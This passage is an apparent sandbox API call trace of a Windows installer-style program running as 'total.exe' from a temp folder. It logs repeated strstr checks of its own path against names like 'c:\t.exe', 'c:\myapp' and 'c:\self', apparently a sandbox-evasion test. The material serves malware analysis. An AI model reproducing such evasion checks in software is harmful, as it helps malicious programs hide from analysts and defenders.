[0157.892] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.892] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.892] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.892] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.892] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.892] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\t.exe')i.R0 ?c" [0157.893] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.893] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.893] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.893] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.893] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.893] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.893] lstrcpyA (in: lpString1=0x321398, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.893] lstrcpyA (in: lpString1=0x3217a8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.893] lstrcpyA (in: lpString1=0x321ba8, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.893] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.893] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.893] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.893] lstrlenA (lpString="strstr") returned 6 [0157.893] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.893] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.893] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.894] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.894] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\t.exe") returned 0x0 [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\t.exe", iMaxLength=1024 | out: lpString1="c:\\t.exe") returned="c:\\t.exe" [0157.894] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.894] wsprintfA (in: param_1=0x322c50, param_2="%d" | out: param_1="0") returned 1 [0157.894] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.894] lstrlenA (lpString="0") returned 1 [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.894] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.894] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.894] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.894] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.894] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.894] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.894] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.895] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.895] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\myapp')i.R0 ?c" [0157.895] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.895] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.895] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.895] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.895] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.895] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.895] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.895] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.895] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.895] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.895] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.895] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.895] lstrlenA (lpString="strstr") returned 6 [0157.896] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.896] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.896] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\myapp") returned 0x0 [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\myapp", iMaxLength=1024 | out: lpString1="c:\\myapp") returned="c:\\myapp" [0157.896] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.896] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.896] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.896] lstrlenA (lpString="0") returned 1 [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.896] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.896] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.896] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.896] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.896] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.896] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.896] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.897] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.897] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\self')i.R0 ?c" [0157.897] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.897] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.897] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.897] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.897] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.897] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.897] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.897] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.897] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.897] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.897] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.898] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.898] lstrlenA (lpString="strstr") returned 6 [0157.898] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.898] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.898] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\self") returned 0x0 [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\self", iMaxLength=1024 | out: lpString1="c:\\self") returned="c:\\self" [0157.898] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.898] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.898] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.898] lstrlenA (lpString="0") returned 1 [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.898] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.898] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.898] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.898] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.899] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.899] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.900] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c" [0157.900] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.900] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.900] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.900] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.900] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.900] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.900] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.900] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.900] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.900] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.900] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.901] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.901] lstrlenA (lpString="strstr") returned 6 [0157.901] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.901] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.901] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\file") returned 0x0 [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.901] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.901] lstrlenA (lpString="0") returned 1 [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.901] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.901] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.901] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 